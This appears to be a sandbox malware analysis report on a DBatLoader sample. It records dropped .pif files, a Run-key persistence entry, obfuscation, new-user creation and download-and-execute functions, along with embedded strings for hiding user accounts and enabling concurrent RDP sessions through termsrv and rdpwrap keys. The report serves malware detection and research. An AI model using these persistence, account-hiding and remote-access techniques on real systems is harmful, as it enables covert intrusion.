Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\Libraries\kwtqutrL.pif Directory created: C:\Program Files\Microsoft DN1 Jump to behavior
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: qqig1mHX8U.exe, qqig1mHX8U.exe, 00000000.00000003.2303201589.000000007FB50000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2439003284.0000000020DB0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2301265871.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2439003284.0000000020D7F000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2439003284.0000000020DC7000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2418192192.0000000002F3E000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.0000000000E90000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000E00000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000E90000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000E00000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.2389531552.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000008.00000000.2397762668.0000000000521000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000B.00000000.2410760437.0000000000521000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000C.00000000.2414590371.0000000000521000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000010.00000000.2512408677.0000000000521000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000011.00000000.2517869273.0000000000521000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000012.00000000.2519481424.0000000000521000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.2393869535.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000000D.00000000.2415883952.0000000000D41000.00000020.00000001.01000000.0000000A.sdmp, xpha.pif.6.dr
Source: Binary string: easinvoker.pdbH source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: qqig1mHX8U.exe, 00000000.00000003.2303201589.000000007FB50000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2395728628.0000000021C2E000.00000004.00000020.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2395728628.0000000021BFD000.00000004.00000020.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2439003284.0000000020DB0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2302443683.0000000002D5C000.00000004.00000020.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2301265871.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2415926480.0000000002D5A000.00000004.00000020.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2439003284.0000000020D7F000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2439003284.0000000020DC7000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2418192192.0000000002F3E000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.0000000000E90000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000E00000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000E90000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000E00000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000C.00000000.2414590371.0000000000521000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000010.00000000.2512408677.0000000000521000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000011.00000000.2517869273.0000000000521000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000012.00000000.2519481424.0000000000521000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
Source: Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.2393869535.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 0000000D.00000000.2415883952.0000000000D41000.00000020.00000001.01000000.0000000A.sdmp, xpha.pif.6.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\Public\Libraries\kwtqutrL.pif Unpacked PE file: 10.2.kwtqutrL.pif.400000.4.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;.bss:R;
Source: C:\Users\Public\Libraries\kwtqutrL.pif Unpacked PE file: 21.2.kwtqutrL.pif.400000.7.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;.bss:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\Public\Libraries\kwtqutrL.pif Unpacked PE file: 10.2.kwtqutrL.pif.400000.4.unpack
Source: C:\Users\Public\Libraries\kwtqutrL.pif Unpacked PE file: 21.2.kwtqutrL.pif.400000.7.unpack
Yara detected DBatLoader
Source: Yara match File source: 0.2.qqig1mHX8U.exe.2f10000.0.unpack, type: UNPACKEDPE
Binary contains a suspicious time stamp
Source: kwtqutrL.pif.0.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F2894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02F2894C
PE file contains sections with non-standard names
Source: alpha.pif.5.dr Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F3D2FC push 02F3D367h; ret 0_2_02F3D35F
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F163B0 push 02F1640Bh; ret 0_2_02F16403
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F163AE push 02F1640Bh; ret 0_2_02F16403
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F3C378 push 02F3C56Eh; ret 0_2_02F3C566
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F1C349 push 8B02F1C1h; ret 0_2_02F1C34E
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F1332C push eax; ret 0_2_02F13368
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F3D0AC push 02F3D125h; ret 0_2_02F3D11D
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F2306B push 02F230B9h; ret 0_2_02F230B1
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F2306C push 02F230B9h; ret 0_2_02F230B1
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F3D1F8 push 02F3D288h; ret 0_2_02F3D280
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F3D144 push 02F3D1ECh; ret 0_2_02F3D1E4
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F2F108 push ecx; mov dword ptr [esp], edx 0_2_02F2F10D
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F16782 push 02F167C6h; ret 0_2_02F167BE
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F16784 push 02F167C6h; ret 0_2_02F167BE
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F1D5A0 push 02F1D5CCh; ret 0_2_02F1D5C4
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F3C570 push 02F3C56Eh; ret 0_2_02F3C566
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F1C56C push ecx; mov dword ptr [esp], edx 0_2_02F1C571
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F2AAE0 push 02F2AB18h; ret 0_2_02F2AB10
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F28AD8 push 02F28B10h; ret 0_2_02F28B08
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F84A50 push eax; ret 0_2_02F84B20
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F1CA4E push 02F1CD72h; ret 0_2_02F1CD6A
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F1CBEC push 02F1CD72h; ret 0_2_02F1CD6A
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F2886C push 02F288AEh; ret 0_2_02F288A6
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F26946 push 02F269F3h; ret 0_2_02F269EB
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F26948 push 02F269F3h; ret 0_2_02F269EB
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F2790C push 02F27989h; ret 0_2_02F27981
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F25E7C push ecx; mov dword ptr [esp], edx 0_2_02F25E7E
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F22F60 push 02F22FD6h; ret 0_2_02F22FCE
Source: C:\Users\Public\alpha.pif Code function: 8_2_005371ED push ecx; ret 8_2_00537200
Source: C:\Users\Public\alpha.pif Code function: 8_2_0053722B push ecx; ret 8_2_0053723E
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_00401230 push eax; ret 10_2_00401244

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Lrtuqtwk.PIF Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Users\user\Desktop\qqig1mHX8U.exe File created: C:\Users\Public\Libraries\kwtqutrL.pif Jump to dropped file
Contains functionality to create new users
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_00410D7A LeaveCriticalSection,NetUserAdd,NetLocalGroupAddMembers, 10_2_00410D7A
Contains functionality to download and launch executables
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_004036EA URLDownloadToFileW,ShellExecuteW, 10_2_004036EA
Drops PE files
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Lrtuqtwk.PIF Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Users\user\Desktop\qqig1mHX8U.exe File created: C:\Users\Public\Libraries\kwtqutrL.pif Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_0040314B GetPrivateProfileStringW,ExitProcess,GetModuleFileNameA,CharLowerW,CharLowerW,CharLowerW,lstrcmpW,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,WinExec, 10_2_0040314B
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_0040D379 lstrcatW,GetBinaryTypeW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,GetPrivateProfileStringW,lstrlenW,lstrcpyW,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,lstrlenW,lstrcpyW,CopyFileW,lstrlenW,lstrcpyW,PathFileExistsW,lstrlenW,lstrcpyW,GetPrivateProfileStringW, 10_2_0040D379
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_0040CD01 GetBinaryTypeW,lstrlenW,lstrcpyW,GetPrivateProfileStringW,lstrlenW,lstrcpyW,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,lstrlenW,lstrcpyW,CopyFileW,lstrlenW,lstrcpyW,PathFileExistsW,lstrlenW,lstrcpyW,GetPrivateProfileStringW, 10_2_0040CD01
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_0040314B GetPrivateProfileStringW,ExitProcess,GetModuleFileNameA,CharLowerW,CharLowerW,CharLowerW,lstrcmpW,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,WinExec, 21_2_0040314B
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_0040D379 lstrcatW,GetBinaryTypeW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,GetPrivateProfileStringW,lstrlenW,lstrcpyW,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,lstrlenW,lstrcpyW,CopyFileW,lstrlenW,lstrcpyW,PathFileExistsW,lstrlenW,lstrcpyW,GetPrivateProfileStringW, 21_2_0040D379
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_0040CD01 GetBinaryTypeW,lstrlenW,lstrcpyW,GetPrivateProfileStringW,lstrlenW,lstrcpyW,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,lstrlenW,lstrcpyW,CopyFileW,lstrlenW,lstrcpyW,PathFileExistsW,lstrlenW,lstrcpyW,GetPrivateProfileStringW, 21_2_0040CD01

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_00410E64 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 10_2_00410E64
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Lrtuqtwk Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Lrtuqtwk Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Contains functionality to hide user accounts
Source: qqig1mHX8U.exe, 00000000.00000003.2400002737.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: qqig1mHX8U.exe, 00000000.00000003.2400002737.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: qqig1mHX8U.exe, 00000000.00000002.2441581581.0000000021EDF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
